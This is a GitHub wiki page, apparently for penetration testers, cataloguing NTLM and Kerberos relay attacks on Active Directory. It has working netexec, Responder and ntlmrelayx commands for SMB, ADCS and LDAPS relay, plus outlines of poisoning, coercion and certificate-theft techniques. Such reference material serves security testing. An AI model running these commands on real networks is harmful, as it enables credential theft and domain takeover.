Home - oscpname/RELAY_scenarios GitHub Wiki
Welcome to the RELAY_scenarios wiki!
THEORY
AD mindmap: https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
NTLM relay: https://en.hackndo.com/ntlm-relay/
Potato: https://www.r-tec.net/r-tec-blog-windows-is-and-always-will-be-a-potatoland.html
Kerberos: https://github.com/CICADA8-Research/Penetration/blob/main/KrbRelay%20MindMap/KrbRelay.drawio.png
Tools:
- https://github.com/decoder-it/KrbRelayEx-RPC
- https://github.com/dirkjanm/krbrelayx
- https://github.com/nullenc0de/relaytoolkit
CLASSIC
```shell
# List hosts where SMB signing is not required (relay candidates)
netexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# Start Responder
responder -I <interface> -wrf
# SMB relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# ADCS relay
impacket-ntlmrelayx -tf targets.txt -t http://dc/certsrv/certfnsh.asp -smb2support
# LDAPS relay
impacket-ntlmrelayx -tf targets.txt -t ldaps://dc -wh attacker-wpad --delegate-access
```
SCENARIOS
- 2025: SMB downgrade to WEBDAV and then relay
- 2025: Standard relay with auto execution
- 2025: DNS poison/spoof with insecure update and relay with KrbRelayEx-RPC
- 2024: DNS poison/spoof with insecure update and Kerberos: KrbRelay-SMBServer
- 2019: DNS poison/spoof with insecure update and NTLM: SMB relay
- 2019: Rubeus monitor
- NO USER, but have IPv6 > krbrelayx + mitm6
- NO USER, but LLMNR > krbrelayx + responder OR krbrelayx + pretender
- NO USER, but DNS update possible/insecure > krbjack + adddns + KrbRelay-SMBServer
- NO USER, just MITM > KrbRelayEx
TYPICAL STEPS
Initial Reconnaissance
- Detects broadcast protocols (LLMNR/NBT-NS/mDNS)
- Identifies systems with SMB signing disabled
- Discovers potential ADCS endpoints
- Maps attack surface
Active Collection
- Broadcast protocol poisoning
- DHCP WPAD injection
- Multiple coercion file deployment
- IPv6 DNS takeover
Relay Attacks
- SMB relay with SOCKS proxy
- LDAPS relay with computer account creation
- ADCS certificate theft
- Shadow Credentials attacks
Individual Techniques
Protocol Poisoning
- LLMNR/NBT-NS/mDNS responses
- WPAD injection
- IPv6 DNS takeover
Coercion Files
- WebDAV search connectors
- SCF files
- URL shortcuts
- Print notifications
Relay Capabilities
- SMB relay
- LDAPS relay
- ADCS relay
- SOCKS proxy support